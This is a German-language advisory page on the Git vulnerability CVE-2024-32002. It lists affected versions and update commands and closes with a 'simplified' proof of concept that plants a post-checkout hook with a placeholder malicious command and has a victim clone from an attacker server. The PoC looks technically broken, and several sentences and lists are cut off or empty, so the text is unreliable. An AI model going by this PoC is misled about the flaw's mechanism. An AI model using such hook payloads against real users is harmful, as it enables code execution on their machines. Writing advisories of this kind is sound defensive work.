
keine
CVE-2024-32002 ist eine schwerwiegende Sicherheitslücke, die in der Git-Software entdeckt wurde. Diese Schwachstelle ermöglicht es einem entfernten Angreifer, über ein speziell präpariertes Git-Repository beliebigen Code auf betroffenen Systemen auszuführen. Die Schwachstelle besteht in der Verarbeitung bestimmter Repository-Operationen durch Git, bei der aufgrund unzureichender Überprüfung der Eingabedaten ein Risiko für Remote-Code-Ausführung (RCE) besteht.
Eine erfolgreiche Ausnutzung dieser Schwachstelle kann Folgendes zur Folge haben:
Die folgenden Versionen der Git-Software sind von CVE-2024-32002 betroffen:
Versions
Default Status: unknown
affected at = 2.45.0
affected at = 2.44.0
affected at >= 2.43.0, < 2.43.4
affected at >= 2.42.0, < 2.42.2
affected at = 2.41.0
affected at >= 2.40.0, < 2.40.2
affected at < 2.39.4
Details zu CVE-2024-32002 Die Schwachstelle besteht in der Verarbeitung bestimmter Repository-Operationen durch Git. Wenn ein Benutzer ein bösartiges Git-Repository klont oder damit interagiert, kann der Angreifer durch ein speziell präpariertes Repository oder eine spezielle Commit-Historie bösartigen Code einschleusen. Aufgrund mangelhafter Eingabevalidierung kann dieser bösartige Code bei der Ausführung von Repository-Operationen die Sicherheitsprüfungen umgehen und zur Ausführung beliebigen Codes führen.
git clone, git pull), wird der bösartige Code ausgelöst und ausgeführt.Benutzern wird dringend empfohlen, auf die neueste Version der Git-Software zu aktualisieren, die den Patch für diese Schwachstelle enthält. Die reparierten Versionen lauten:
Der Aktualisierungsbefehl lautet wie folgt:
# Für macOS
brew upgrade git
# Für Ubuntu/Debian
sudo apt-get update
sudo apt-get install git
# Für CentOS/RHEL
sudo yum update git
Ein Proof-of-Concept (PoC) für CVE-2024-32002 wurde veröffentlicht. Nachfolgend ein vereinfachtes PoC-Beispiel:
# Angreifer erstellt bösartiges Repository
git init malicious-repo
cd malicious-repo
echo 'malicious content' > payload.txt
git add payload.txt
git commit -m "Add malicious payload"
# Auslösen der Schwachstelle durch injizierte Commit-Historie mit bösartigem Code
git config --local core.hooksPath .githooks
echo 'evil_command' > .githooks/post-checkout
git add .githooks
git commit -m "Add post-checkout hook"
# Opfer klont das bösartige Repository und löst die Schwachstelle aus
git clone attacker_server/malicious-repo